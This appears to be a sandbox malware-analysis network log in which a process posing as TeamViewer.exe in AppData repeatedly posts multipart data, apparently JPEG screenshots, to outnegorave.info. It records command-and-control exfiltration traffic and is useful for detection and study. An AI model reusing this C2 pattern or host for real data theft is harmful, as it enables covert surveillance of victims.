                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J4XqNdjqm5DpUU42drANLX%2BfTXlfoCZD7Ghy7ZZV5FkgXWYitsRfMcgA5pth2%2BKbj%2FgjmG7gBB5llrbSqsgnNaxl0Kuwy616x753xPxM8ulEHltvMWtws%2Fwq%2F6Slj0vxJD6X"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a62949231f55-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:29 UTC2110INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    25192.168.2.549816172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:30 UTC2110OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84976
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1638634252
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:30 UTC2110OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 36 33 38 36 33 34 32 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1638634252Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:30 UTC2110OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 4f 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^O;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:30 UTC2110OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:30 UTC2126OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:30 UTC2142OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:30 UTC2158OUTData Raw: d0 20 a5 a2 8c 53 10 b4 b4 94 53 10 1a 51 49 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e a2 90 52 d3 24 29 45 14 53 01 68 a0 52 d3 10 94 94 b4 50 02 0e b4 fa 60 eb 4f a1 03 0a 0d 14 53 24 05 2d 20 a7 62 84 0c 50 29 d4 da 70 aa 44 b1 3b d2 d2 1e b4 e1 4c 04 14 ea 6d 28 a6 26 2d 14 51 40 80 52 d2 0a 75 31 09 4e a4 a2 98 31 d4 b4 d1 4b 4c 91 d9 a5 14 da 51 4d 09 8e 14 b4 da 70 a6 4b 0a 5a 4a 29 88 5a 29 29 68 00 a5 a4 a5 a0 05 a5 a6 d3 a8 13 0a 51 49 4b 40 85 a2 92 96 81 05 2d 14 53 00 a5 14 52 8a 04 c5 a0 52 52 8a 04 68 69 23 f7 ee 7d 10 d5 63 d4 fd 6a d6 93 fe ba 4f f7 4d 55 3d 4f d6 b2
                                                                                                                                    Data Ascii: SSQIJ(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))hQIK@-SRRRhi#}cjOMU=O
                                                                                                                                    2021-09-15 11:52:30 UTC2174OUTData Raw: a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2 54 36 5a 42 93 49 49 46 69 31 d8 43 45 06 9b 52 52 0c d1 49 49 4a e3 b1 43 1d e9 69 28 ae 53 ac 5a 28 a3 14 00 51 45 14 08 5a 28 a4 a0 02 8a 28 a0 02 96 92 96 80 0a 28 a2 81 05 14 51 4c
                                                                                                                                    Data Ascii: JRdAE 4U"E4Z.+)sL;\&.iFiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4T6ZBIIFi1CERRIIJCi(SZ(QEZ(((QL
                                                                                                                                    2021-09-15 11:52:30 UTC2190OUTData Raw: a8 d8 6e 9b 4a 63 7d 00 e7 60 18 95 47 d3 f8 bf 0e 7d ab a0 f0 8f 81 b4 33 6b 1d f5 cc bf da 32 1e a8 cb b5 23 6e ea 53 ae 47 70 df 95 20 3c ae 68 a4 82 56 8a 78 de 39 10 e1 91 d4 82 0f b8 34 ca e8 fe 21 22 47 e3 5b f4 8d 55 11 44 40 2a 8c 00 3c a4 ae 72 a8 41 56 f4 db 26 be ba 11 83 b5 07 2e de 82 aa 57 41 e1 7d b8 b9 07 af cb f9 73 53 27 65 a1 15 2a 2a 6b 9d ab d8 dc b3 d1 ad c2 6c b6 b3 12 6d 1c 92 9b 8f e3 55 f5 0f 0e 0b 85 61 1d ab 43 30 e8 55 08 fc c5 6e 8d ff 00 d9 b6 e2 2c 98 c6 77 e3 fb f9 ef f8 62 b6 f4 df 37 ec 29 e7 e7 76 4e dd dd 76 f6 fe b5 86 26 94 a8 61 d6 21 4b 5e c7 a3 0c 75 3a d3 f6 51 87 ba 78 b4 d1 3c 13 3c 52 a9 57 42 55 81 ec 69 95 b5 e3 1f 2f fe 12 8b df 2b 18 dc b9 c7 ae d1 9f d6 b1 6b 6a 72 e7 82 97 74 71 49 59 b4 14 51 4b 56 20
                                                                                                                                    Data Ascii: nJc}`G}3k2#nSGp <hVx94!"G[UD@*<rAV&.WA}sS'e**klmUaC0Un,wb7)vNv&a!K^u:Qx<<RWBUi/+kjrtqIYQKV
                                                                                                                                    2021-09-15 11:52:30 UTC2193OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 36 33 38 36 33 34 32 35 32 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1638634252--
                                                                                                                                    2021-09-15 11:52:32 UTC2193INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:32 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=9ab49e1f20c2ae65824cd9cd72958965646baa096a4e8ce83901ea3ccdde258c; expires=Thu, 15-Sep-2022 11:52:30 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y%2FaLdp4MNF%2F1gizHW%2FM2NzUxRzGHcOolAXjTNlxV0i0yJJWhaaF4KK5ZNF3UvePvLtThAzrKAsq5TveIW3NxrTJ3Pj8MYVh2FxemUty4nj8rADquMqMwz01RX6cOh8rIvUzf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6351a874ecd-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:32 UTC2194INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    26192.168.2.549817172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:32 UTC2194OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85242
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3575858873
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:32 UTC2194OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 35 38 35 38 38 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3575858873Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:32 UTC2194OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 71 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^q;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:32 UTC2195OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:32 UTC2211OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:32 UTC2226OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:32 UTC2242OUTData Raw: ff 00 41 8c fb d7 15 6c 33 7f 0f fd 74 5f e7 5d c7 8b 31 f6 05 fa d7 13 6b ff 00 21 08 3f eb a2 ff 00 3a 30 9f c0 66 f8 af f7 83 b2 d7 7f e3 e9 3f dd ac a3 5a ba ef fc 7d 27 fb b5 94 6a 70 ff 00 c3 46 78 af e2 31 31 47 4a 28 ad ce 61 69 c3 14 da 5a 43 43 a9 69 b4 b4 8a 17 34 e1 4d 14 a2 93 29 0e 14 b9 a6 d3 87 34 99 68 70 a7 e6 9a a2 9f 50 cb 42 8a 7d 34 52 d4 b3 44 2d 02 94 53 b1 48 a4 82 8a 28 a4 31 c2 9c 29 82 9e 2a 59 48 70 a7 0a 68 a5 a9 65 a1 7d 6b 85 f1 99 cd cd bf fb 8d fc eb ba cd 70 be 31 ff 00 8f ab 7f f7 0f f3 ab a5 b9 33 dd 1c 3e 68 a2 92 b1 3a c5 a2 8a 28 00 14 b4 51 40 05 2d 25 2d 31 07 7a 28 a2 80 0c d2 d2 52 d0 02 d1 49 4b 4c 42 51 4a 69 28 00 a2 8a 28 00 a2 8a 28 01 69 28 a5 a0 02 8a 28 a0 05 a0 52 51 9a 62 1d 45 25 2d 30 0a 28 a5 a0 41
                                                                                                                                    Data Ascii: Al3t_]1k!?:0f?Z}'jpFx11GJ(aiZCCi4M)4hpPB}4RD-SH(1)*YHphe}kp13>h:(Q@-%-1z(RIKLBQJi(((i((RQbE%-0(A
                                                                                                                                    2021-09-15 11:52:32 UTC2258OUTData Raw: 14 2c 58 28 1c 0c 60 63 b7 5e 6b 3a 8a 5e ce 36 b0 fd a4 af 73 4d 75 88 d6 14 93 ec 4d fd a0 96 9f 65 13 f9 df 26 dd bb 37 6c db 9d db 78 fb d8 ef 8a cb 51 85 02 96 8a a5 14 9d c9 72 6f 40 a2 8a 2a 89 0a 28 a2 80 0a 5a 28 a6 20 a2 8a 28 01 68 a4 a2 80 16 96 92 8a 04 2d 14 94 b4 c0 28 a2 8a 00 28 14 51 40 0b 45 27 14 66 80 1d 45 26 68 cd 3b 8a c3 85 14 dc d1 45 c2 c3 e8 c8 a6 51 4e e2 b0 fc d1 9a 6d 14 5c 2c 3b 34 99 a2 8a 00 28 a2 8a 00 5a 29 28 a6 02 d2 d2 50 28 10 b4 51 45 00 2d 14 94 53 10 ea 29 28 a0 05 14 b4 94 50 21 69 69 b4 b4 c0 75 14 da 29 8a c3 a8 a4 cd 2d 00 14 b4 94 53 10 b4 51 45 02 16 8c d2 0a 5a 60 2d 14 94 b4 00 b4 52 52 d3 10 b4 52 52 d0 21 69 45 25 2d 31 05 14 94 b4 c0 5a 5a 6d 2d 02 1c 28 a4 a5 aa 10 a2 96 9b 9a 5a 62 1d 9a 5a 6d 2d 02
                                                                                                                                    Data Ascii: ,X(`c^k:^6sMuMe&7lxQro@*(Z( (h-((Q@E'fE&h;EQNm\,;4(Z)(P(QE-S)(P!iiu)-SQEZ`-RRRR!iE%-1ZZm-(ZbZm-
                                                                                                                                    2021-09-15 11:52:32 UTC2274OUTData Raw: a9 19 07 05 b3 d2 b9 ea f7 bd 27 7f fc 20 f6 5e 5b 6d 7f ec d8 f6 b6 ed b8 3e 58 c1 cf 6f ad 26 ec 38 ab bb 33 94 d4 f4 4f 11 da f9 36 da 2e 9d ba d1 1d f7 46 67 41 1b 46 18 aa a1 42 c0 1c a8 0c 49 04 e5 fa 8c 62 b1 b5 df 00 6a a2 fb 3a 3e 9c 4d b9 0d c1 9d 38 c3 b0 1d 5b 3c a8 56 ff 00 81 57 5d 69 fd a8 f6 73 e6 f0 bb f9 89 82 2f 15 b0 30 d9 e7 77 1d bf 2f 6a e9 34 91 30 d3 62 17 0e 5e 4e 72 4b ee cf 27 bd 73 c2 bb 95 4f 66 e2 d3 b5 cb a9 05 19 35 17 75 dd 6c 7c ed 45 14 57 49 98 56 be 89 e1 ad 5b 5d 70 2c 2d 58 c5 9c 34 cf f2 c6 bf 8f 7f a0 c9 ac 8a f5 cf 0a 78 7f 4b d7 3c 03 a7 a6 a1 6a ae c0 4a 16 55 e1 d3 f7 af d1 bf a7 4a 18 c4 d2 7e 19 69 70 5b b7 f6 a4 d2 5d ce eb 8c a3 14 54 fa 63 92 7e bf 95 73 da ff 00 c3 5d 42 cf 74 da 44 9f 6d 84 73 e5 b6 16
                                                                                                                                    Data Ascii: ' ^[m>Xo&83O6.FgAFBIbj:>M8[<VW]is/0w/j40b^NrK'sOf5ul|EWIV[]p,-X4xK<jJUJ~ip[]Tc~s]BtDms
                                                                                                                                    2021-09-15 11:52:32 UTC2278OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 35 38 35 38 38 37 33 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3575858873--
                                                                                                                                    2021-09-15 11:52:33 UTC2278INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:33 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=d3aca64313757306a4bdcbb850070bfc082cb726b0335d966c2ed80b99366ddf; expires=Thu, 15-Sep-2022 11:52:32 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7qEocDOA2PzX1s8MVKExEQ96YUIvX4niB2OGKgoiiE59bIIV4rd35kQQ9PNtMxHR%2BWrV3m71K%2FsFo9i2OOwjK41Y5VI5z16WzrG24ApEsccreBXYftwCq2AcoR9RyU6YnTgO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6447b574a8b-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:33 UTC2278INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    27192.168.2.549818172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:33 UTC2278OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84965
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------285568995
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:33 UTC2279OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 35 35 36 38 39 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------285568995Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
